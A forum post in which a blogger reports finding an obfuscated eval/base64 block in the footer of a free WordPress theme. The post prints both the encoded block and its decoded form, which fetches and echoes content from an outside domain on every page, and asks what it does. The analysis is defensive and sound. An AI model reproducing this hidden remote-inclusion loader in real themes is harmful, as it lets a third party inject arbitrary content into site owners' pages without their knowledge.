Thread: dublious code in a wordpress theme for linkdock.com

Today I download a wordpress theme for my blog. It's called simplejojo and it looks quite nice. But I looked at the footer code and I was surprised that there was something encoded. Here is the code:

Code:

<? eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A'))); 
?>

online version
http://paul.****that.com/coded.txt
I decoded and it looks like

Code:

error_reporting(0);
$CodeURL = "http://linkdock.com/content.php?id=&host=".urlencode($_SERVER["HTTP_HOST"])."&uri=".urlencode($_SERVER["REQUEST_URI"]);

if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file_get_contents")) {
    echo @file_get_contents($CodeURL);
} elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file")) {
    $content = @file($CodeURL);
    echo @join("", $content);
} elseif (function_exists("curl_init")) {
    $ch = curl_init($CodeURL);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_exec($ch);
    curl_close($ch);
}

download : http://paul.****that.com/decoded.txt
But I am still at a loss to see what it does. I couldn't find anything on the linkdock.com domain.

I wonder it they use the code for inserting link ads of some sorts. I tried to visit some blogs with the useragent changed to the google bot, but nothing extra was displayed.